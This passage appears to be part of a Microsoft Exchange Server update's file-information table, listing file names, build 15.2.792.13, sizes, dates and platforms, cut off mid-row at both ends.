Cts.8.3.microsoft.exchange.data.common.versionpolicy.cfg| Not applicable| 507| 04-Apr-2021| 07:10| Not applicable
Cts_exsmime.dll| 15.2.792.13| 380,800| 04-Apr-2021| 10:07| x64
Cts_microsoft.exchange.data.common.dll| 15.2.792.13| 1,686,416| 04-Apr-2021| 10:05| x86
Cts_microsoft.exchange.data.common.versionpolicy.cfg| Not applicable| 507| 04-Apr-2021| 07:10| Not applicable
Cts_policy.14.0.microsoft.exchange.data.common.dll| 15.2.792.13| 12,664| 04-Apr-2021| 10:05| x86
Cts_policy.14.1.microsoft.exchange.data.common.dll| 15.2.792.13| 12,672| 04-Apr-2021| 10:05| x86
Cts_policy.14.2.microsoft.exchange.data.common.dll| 15.2.792.13| 12,688| 04-Apr-2021| 10:05| x86
Cts_policy.14.3.microsoft.exchange.data.common.dll| 15.2.792.13| 12,672| 04-Apr-2021| 10:04| x86
Cts_policy.14.4.microsoft.exchange.data.common.dll| 15.2.792.13| 12,672| 04-Apr-2021| 10:04| x86
Cts_policy.15.0.microsoft.exchange.data.common.dll| 15.2.792.13| 12,680| 04-Apr-2021| 10:05| x86
Cts_policy.15.1.microsoft.exchange.data.common.dll| 15.2.792.13| 12,680| 04-Apr-2021| 10:05| x86
Cts_policy.15.2.microsoft.exchange.data.common.dll| 15.2.792.13| 12,680| 04-Apr-2021| 10:04| x86
Cts_policy.15.20.microsoft.exchange.data.common.dll| 15.2.792.13| 12,672| 04-Apr-2021| 10:04| x86
Cts_policy.8.0.microsoft.exchange.data.common.dll| 15.2.792.13| 12,696| 04-Apr-2021| 10:04| x86
Cts_policy.8.1.microsoft.exchange.data.common.dll| 15.2.792.13| 12,672| 04-Apr-2021| 10:06| x86
Cts_policy.8.2.microsoft.exchange.data.common.dll| 15.2.792.13| 12,688| 04-Apr-2021| 10:04| x86
Cts_policy.8.3.microsoft.exchange.data.common.dll| 15.2.792.13| 12,696| 04-Apr-2021| 10:04| x86
Dagcommonlibrary.ps1| Not applicable| 60,242| 04-Apr-2021| 10:04| Not applicable
Dependentassemblygenerator.exe| 15.2.792.13| 22,400| 04-Apr-2021| 10:06| x86
Diaghelper.dll| 15.2.792.13| 66,944| 04-Apr-2021| 10:05| x86
Diagnosticscriptcommonlibrary.ps1| Not applicable| 16,374| 04-Apr-2021| 10:03| Not applicable
Disableinmemorytracing.ps1| Not applicable| 13,402| 04-Apr-2021| 10:06| Not applicable
Disable_antimalwarescanning.ps1| Not applicable| 15,225| 04-Apr-2021| 10:06| Not applicable
Disable_outsidein.ps1| Not applicable| 13,694| 04-Apr-2021| 10:06| Not applicable
Disklockerapi.dll| Not applicable| 22,424| 04-Apr-2021| 10:06| x64
Dlmigrationmodule.psm1| Not applicable| 39,616| 04-Apr-2021| 10:05| Not applicable
Dsaccessperf.dll| 15.2.792.13| 45,952| 04-Apr-2021| 10:03| x64
Dscperf.dll| 15.2.792.13| 32,640| 04-Apr-2021| 10:03| x64
Dup_cts_microsoft.exchange.data.common.dll| 15.2.792.13| 1,686,416| 04-Apr-2021| 10:05| x86
Dup_ext_microsoft.exchange.data.transport.dll| 
15.2.792.13| 601,496| 04-Apr-2021| 10:03| x86 \nEcpperfcounters.xml| Not applicable| 31,144| 04-Apr-2021| 10:04| Not applicable \nEdgeextensibility_microsoft.exchange.data.transport.versionpolicy.cfg| Not applicable| 510| 04-Apr-2021| 07:10| Not applicable \nEdgeextensibility_policy.8.0.microsoft.exchange.data.transport.dll| 15.2.792.13| 12,672| 04-Apr-2021| 10:07| x86 \nEdgetransport.exe| 15.2.792.13| 49,544| 04-Apr-2021| 10:07| x86 \nEext.14.0.microsoft.exchange.data.transport.versionpolicy.cfg| Not applicable| 510| 04-Apr-2021| 07:10| Not applicable \nEext.14.1.microsoft.exchange.data.transport.versionpolicy.cfg| Not applicable| 510| 04-Apr-2021| 07:10| Not applicable \nEext.14.2.microsoft.exchange.data.transport.versionpolicy.cfg| Not applicable| 510| 04-Apr-2021| 07:10| Not applicable \nEext.14.3.microsoft.exchange.data.transport.versionpolicy.cfg| Not applicable| 510| 04-Apr-2021| 07:10| Not applicable \nEext.14.4.microsoft.exchange.data.transport.versionpolicy.cfg| Not applicable| 510| 04-Apr-2021| 07:10| Not applicable \nEext.15.0.microsoft.exchange.data.transport.versionpolicy.cfg| Not applicable| 510| 04-Apr-2021| 07:10| Not applicable \nEext.15.1.microsoft.exchange.data.transport.versionpolicy.cfg| Not applicable| 510| 04-Apr-2021| 07:10| Not applicable \nEext.15.2.microsoft.exchange.data.transport.versionpolicy.cfg| Not applicable| 510| 04-Apr-2021| 07:10| Not applicable \nEext.15.20.microsoft.exchange.data.transport.versionpolicy.cfg| Not applicable| 510| 04-Apr-2021| 07:10| Not applicable \nEext.8.1.microsoft.exchange.data.transport.versionpolicy.cfg| Not applicable| 510| 04-Apr-2021| 07:10| Not applicable \nEext.8.2.microsoft.exchange.data.transport.versionpolicy.cfg| Not applicable| 510| 04-Apr-2021| 07:10| Not applicable \nEext.8.3.microsoft.exchange.data.transport.versionpolicy.cfg| Not applicable| 510| 04-Apr-2021| 07:10| Not applicable \nEext_policy.14.0.microsoft.exchange.data.transport.dll| 15.2.792.13| 12,696| 04-Apr-2021| 10:07| x86 
\nEext_policy.14.1.microsoft.exchange.data.transport.dll| 15.2.792.13| 12,680| 04-Apr-2021| 10:07| x86 \nEext_policy.14.2.microsoft.exchange.data.transport.dll| 15.2.792.13| 12,680| 04-Apr-2021| 10:06| x86 \nEext_policy.14.3.microsoft.exchange.data.transport.dll| 15.2.792.13| 12,672| 04-Apr-2021| 10:05| x86 \nEext_policy.14.4.microsoft.exchange.data.transport.dll| 15.2.792.13| 12,672| 04-Apr-2021| 10:07| x86 \nEext_policy.15.0.microsoft.exchange.data.transport.dll| 15.2.792.13| 12,672| 04-Apr-2021| 10:07| x86 \nEext_policy.15.1.microsoft.exchange.data.transport.dll| 15.2.792.13| 12,672| 04-Apr-2021| 10:06| x86 \nEext_policy.15.2.microsoft.exchange.data.transport.dll| 15.2.792.13| 12,672| 04-Apr-2021| 10:06| x86 \nEext_policy.15.20.microsoft.exchange.data.transport.dll| 15.2.792.13| 13,184| 04-Apr-2021| 10:06| x86 \nEext_policy.8.1.microsoft.exchange.data.transport.dll| 15.2.792.13| 12,688| 04-Apr-2021| 10:07| x86 \nEext_policy.8.2.microsoft.exchange.data.transport.dll| 15.2.792.13| 12,696| 04-Apr-2021| 10:07| x86 \nEext_policy.8.3.microsoft.exchange.data.transport.dll| 15.2.792.13| 12,680| 04-Apr-2021| 10:07| x86 \nEnableinmemorytracing.ps1| Not applicable| 13,404| 04-Apr-2021| 10:06| Not applicable \nEnable_antimalwarescanning.ps1| Not applicable| 17,579| 04-Apr-2021| 10:05| Not applicable \nEnable_basicauthtooauthconverterhttpmodule.ps1| Not applicable| 18,604| 04-Apr-2021| 10:06| Not applicable \nEnable_crossforestconnector.ps1| Not applicable| 18,638| 04-Apr-2021| 10:06| Not applicable \nEnable_outlookcertificateauthentication.ps1| Not applicable| 22,952| 04-Apr-2021| 10:05| Not applicable \nEnable_outsidein.ps1| Not applicable| 13,683| 04-Apr-2021| 10:05| Not applicable \nEngineupdateserviceinterfaces.dll| 15.2.792.13| 17,800| 04-Apr-2021| 10:07| x86 \nEscprint.dll| 15.2.792.13| 20,360| 04-Apr-2021| 10:05| x64 \nEse.dll| 15.2.792.13| 3,741,592| 04-Apr-2021| 10:04| x64 \nEseback2.dll| 15.2.792.13| 350,080| 04-Apr-2021| 10:03| x64 \nEsebcli2.dll| 15.2.792.13| 
318,360| 04-Apr-2021| 10:04| x64 \nEseperf.dll| 15.2.792.13| 108,936| 04-Apr-2021| 10:06| x64 \nEseutil.exe| 15.2.792.13| 425,352| 04-Apr-2021| 10:03| x64 \nEsevss.dll| 15.2.792.13| 44,416| 04-Apr-2021| 10:05| x64 \nEtweseproviderresources.dll| 15.2.792.13| 101,248| 04-Apr-2021| 10:04| x64 \nEventperf.dll| 15.2.792.13| 59,800| 04-Apr-2021| 10:04| x64 \nExchange.depthtwo.types.ps1xml| Not applicable| 40,136| 04-Apr-2021| 10:07| Not applicable \nExchange.format.ps1xml| Not applicable| 649,725| 04-Apr-2021| 10:07| Not applicable \nExchange.partial.types.ps1xml| Not applicable| 44,370| 04-Apr-2021| 10:06| Not applicable \nExchange.ps1| Not applicable| 20,831| 04-Apr-2021| 10:06| Not applicable \nExchange.support.format.ps1xml| Not applicable| 26,551| 04-Apr-2021| 10:07| Not applicable \nExchange.types.ps1xml| Not applicable| 365,180| 04-Apr-2021| 10:07| Not applicable \nExchangeudfcommon.dll| 15.2.792.13| 122,760| 04-Apr-2021| 10:07| x86 \nExchangeudfs.dll| 15.2.792.13| 272,760| 04-Apr-2021| 10:07| x86 \nExchmem.dll| 15.2.792.13| 86,408| 04-Apr-2021| 10:06| x64 \nExchsetupmsg.dll| 15.2.792.13| 19,352| 04-Apr-2021| 10:05| x64 \nExdbfailureitemapi.dll| Not applicable| 27,032| 04-Apr-2021| 10:05| x64 \nExdbmsg.dll| 15.2.792.13| 230,792| 04-Apr-2021| 10:05| x64 \nExeventperfplugin.dll| 15.2.792.13| 25,472| 04-Apr-2021| 10:07| x64 \nExmime.dll| 15.2.792.13| 364,928| 04-Apr-2021| 10:07| x64 \nExportedgeconfig.ps1| Not applicable| 27,427| 04-Apr-2021| 10:06| Not applicable \nExport_mailpublicfoldersformigration.ps1| Not applicable| 18,598| 04-Apr-2021| 10:05| Not applicable \nExport_modernpublicfolderstatistics.ps1| Not applicable| 29,246| 04-Apr-2021| 10:05| Not applicable \nExport_outlookclassification.ps1| Not applicable| 14,414| 04-Apr-2021| 10:04| Not applicable \nExport_publicfolderstatistics.ps1| Not applicable| 23,165| 04-Apr-2021| 10:06| Not applicable \nExport_retentiontags.ps1| Not applicable| 17,084| 04-Apr-2021| 10:06| Not applicable \nExppw.dll| 15.2.792.13| 
83,328| 04-Apr-2021| 10:04| x64 \nExprfdll.dll| 15.2.792.13| 26,496| 04-Apr-2021| 10:06| x64 \nExrpc32.dll| 15.2.792.13| 2,029,464| 04-Apr-2021| 10:04| x64 \nExrw.dll| 15.2.792.13| 28,040| 04-Apr-2021| 10:03| x64 \nExsetdata.dll| 15.2.792.13| 2,779,544| 04-Apr-2021| 10:06| x64 \nExsetup.exe| 15.2.792.13| 35,208| 04-Apr-2021| 10:05| x86 \nExsetupui.exe| 15.2.792.13| 471,944| 04-Apr-2021| 10:06| x86 \nExtrace.dll| 15.2.792.13| 245,144| 04-Apr-2021| 10:03| x64 \nExt_microsoft.exchange.data.transport.dll| 15.2.792.13| 601,496| 04-Apr-2021| 10:03| x86 \nExwatson.dll| 15.2.792.13| 44,936| 04-Apr-2021| 10:03| x64 \nFastioext.dll| 15.2.792.13| 60,312| 04-Apr-2021| 10:06| x64 \nFil06f84122c94c91a0458cad45c22cce20| Not applicable| 784,631| 04-Apr-2021| 10:04| Not applicable \nFil143a7a5d4894478a85eefc89a6539fc8| Not applicable| 1,909,228| 04-Apr-2021| 10:04| Not applicable \nFil19f527f284a0bb584915f9994f4885c3| Not applicable| 648,760| 04-Apr-2021| 10:04| Not applicable \nFil1a9540363a531e7fb18ffe600cffc3ce| Not applicable| 358,405| 04-Apr-2021| 10:06| Not applicable \nFil220d95210c8697448312eee6628c815c| Not applicable| 303,657| 04-Apr-2021| 10:06| Not applicable \nFil2cf5a31e239a45fabea48687373b547c| Not applicable| 652,759| 04-Apr-2021| 10:04| Not applicable \nFil397f0b1f1d7bd44d6e57e496decea2ec| Not applicable| 784,628| 04-Apr-2021| 10:04| Not applicable \nFil3ab126057b34eee68c4fd4b127ff7aee| Not applicable| 784,604| 04-Apr-2021| 10:04| Not applicable \nFil41bb2e5743e3bde4ecb1e07a76c5a7a8| Not applicable| 149,154| 04-Apr-2021| 10:03| Not applicable \nFil51669bfbda26e56e3a43791df94c1e9c| Not applicable| 9,345| 04-Apr-2021| 10:04| Not applicable \nFil558cb84302edfc96e553bcfce2b85286| Not applicable| 85,259| 04-Apr-2021| 10:04| Not applicable \nFil55ce217251b77b97a46e914579fc4c64| Not applicable| 648,754| 04-Apr-2021| 10:04| Not applicable \nFil5a9e78a51a18d05bc36b5e8b822d43a8| Not applicable| 1,596,145| 04-Apr-2021| 10:03| Not applicable 
\nFil5c7d10e5f1f9ada1e877c9aa087182a9| Not applicable| 1,596,145| 04-Apr-2021| 10:03| Not applicable \nFil6569a92c80a1e14949e4282ae2cc699c| Not applicable| 1,596,145| 04-Apr-2021| 10:03| Not applicable \nFil6a01daba551306a1e55f0bf6894f4d9f| Not applicable| 648,730| 04-Apr-2021| 10:05| Not applicable \nFil8863143ea7cd93a5f197c9fff13686bf| Not applicable| 648,760| 04-Apr-2021| 10:04| Not applicable \nFil8a8c76f225c7205db1000e8864c10038| Not applicable| 1,596,145| 04-Apr-2021| 10:03| Not applicable \nFil8cd999415d36ba78a3ac16a080c47458| Not applicable| 784,634| 04-Apr-2021| 10:04| Not applicable \nFil97913e630ff02079ce9889505a517ec0| Not applicable| 1,596,145| 04-Apr-2021| 10:03| Not applicable \nFilaa49badb2892075a28d58d06560f8da2| Not applicable| 785,658| 04-Apr-2021| 10:04| Not applicable \nFilae28aeed23ccb4b9b80accc2d43175b5| Not applicable| 648,757| 04-Apr-2021| 10:04| Not applicable \nFilb17f496f9d880a684b5c13f6b02d7203| Not applicable| 784,634| 04-Apr-2021| 10:05| Not applicable \nFilb94ca32f2654692263a5be009c0fe4ca| Not applicable| 2,564,949| 04-Apr-2021| 10:04| Not applicable \nFilbabdc4808eba0c4f18103f12ae955e5c| Not applicable| 342,875,757| 04-Apr-2021| 10:05| Not applicable \nFilc92cf2bf29bed21bd5555163330a3d07| Not applicable| 652,777| 04-Apr-2021| 10:04| Not applicable \nFilcc478d2a8346db20c4e2dc36f3400628| Not applicable| 784,634| 04-Apr-2021| 10:04| Not applicable \nFild26cd6b13cfe2ec2a16703819da6d043| Not applicable| 1,596,145| 04-Apr-2021| 10:03| Not applicable \nFilf2719f9dc8f7b74df78ad558ad3ee8a6| Not applicable| 785,640| 04-Apr-2021| 10:04| Not applicable \nFilfa5378dc76359a55ef20cc34f8a23fee| Not applicable| 1,427,187| 04-Apr-2021| 10:03| Not applicable \nFilteringconfigurationcommands.ps1| Not applicable| 18,267| 04-Apr-2021| 10:06| Not applicable \nFilteringpowershell.dll| 15.2.792.13| 223,112| 04-Apr-2021| 10:07| x86 \nFilteringpowershell.format.ps1xml| Not applicable| 29,652| 04-Apr-2021| 10:07| Not applicable \nFiltermodule.dll| 15.2.792.13| 
180,104| 04-Apr-2021| 10:04| x64 \nFipexeuperfctrresource.dll| 15.2.792.13| 15,232| 04-Apr-2021| 10:05| x64 \nFipexeventsresource.dll| 15.2.792.13| 44,936| 04-Apr-2021| 10:07| x64 \nFipexperfctrresource.dll| 15.2.792.13| 32,640| 04-Apr-2021| 10:05| x64 \nFirewallres.dll| 15.2.792.13| 72,600| 04-Apr-2021| 10:07| x64 \nFms.exe| 15.2.792.13| 1,350,024| 04-Apr-2021| 10:07| x64 \nForefrontactivedirectoryconnector.exe| 15.2.792.13| 110,976| 04-Apr-2021| 10:06| x64 \nFpsdiag.exe| 15.2.792.13| 18,840| 04-Apr-2021| 10:04| x86 \nFsccachedfilemanagedlocal.dll| 15.2.792.13| 822,168| 04-Apr-2021| 10:04| x64 \nFscconfigsupport.dll| 15.2.792.13| 56,712| 04-Apr-2021| 10